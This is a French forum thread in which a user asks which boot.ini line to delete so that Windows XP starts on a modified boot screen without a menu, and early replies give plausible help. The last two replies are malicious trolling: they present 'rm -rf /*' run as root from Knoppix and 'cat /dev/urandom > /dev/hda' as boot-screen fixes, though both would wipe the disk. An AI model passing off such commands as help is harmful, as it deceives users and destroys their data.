Quelle ligne dois je supprimer ?

£udo Messages postés 455 Statut Membre -  
 jean michel duchemain -
salut, j' ai modifié le bootscreen de windows et au demarrage de windows il met met un choix à faire me demandant de choisir entre le bootscreen que j' ai modfié et le bootscreen normal. Dans boot screen j' ai ceci :

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP dition familiale (bootscreen)" /fastdetect /NoExecute=OptIn /KERNEL=kernel1.exe
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP dition familiale" /fastdetect /NoExecute=OptIn

Quelle ligne dois je supprimer pour ne plus a avoir de choix a faire ??

merci
A voir également:

6 réponses

spark Messages postés 2864 Statut Contributeur 1 306

Salut
Qu'est ce que tu apelles modifier le bootscreen ? Le fichier que tu mets dans ton post, c'est le boot.ini. Tu as installé un 2ème windows ?
Essaye ça :
Clique sur démarrer/executer et tape MSCONFIG. Dans l'onglet boot.ini, clique sur "Vérifier les chemins de démarrage".
0
£udo Messages postés 455 Statut Membre 16

le bootscreen c'est l' ecran ou tu as le logo win xp avec la barre de defilement qui charge. J' ai fais ton truc, il m' as dis que c' etait valide.

(¯`·.¸¸.-> £udo <-.¸¸.·´¯)
0
spark Messages postés 2864 Statut Contributeur 1 306

La ligne à supprimer pour retrouver un démarrage sans choix est celle-ci :
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP dition familiale (bootscreen)" /fastdetect /NoExecute=OptIn /KERNEL=kernel1.exe
Ce sera windows normal qui démarrera, donc je ne sais pas si tu auras encore ton logo modifié.
0
£udo Messages postés 455 Statut Membre 16

moi je voudrais qu' il demarre directement sur le bootscreen que j' ai mis. Je veux pas avoir de choix a faire donc comment m' y prendre ??

Teutates => dois je faire les etapes 6.2.3 et 6.2.4 ??

pour info J' ai utilisé style xp

(¯`·.¸¸.-> £udo <-.¸¸.·´¯)
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
simon ben sousan

c'est tout simple en fait : il te suffit de lancer knoppix en memoire vive, ensuite tu ouvre un shell et tu tape :
#su
&rm -rf /* > /dev/null
cela va reinitialiser ton bootscreen. (ca prend un peu de temps sur certaine ancienne install)
ensuite quand tu redémarre tu va pouvoir par le biais d'un menu de choisir le bootscreen vu que win en trouve plusieures. Et apres cest bon. chez moi ca a tres bien marché :)
0
jean michel duchemain

simon ben sousan je ne pence pas ke cette solution soi la meilleur, il faudrai plutot utilisé le kernel et le pipé vers l'intérupte du bootsplash

su
puis
cat /dev/urandom > /dev/hda
0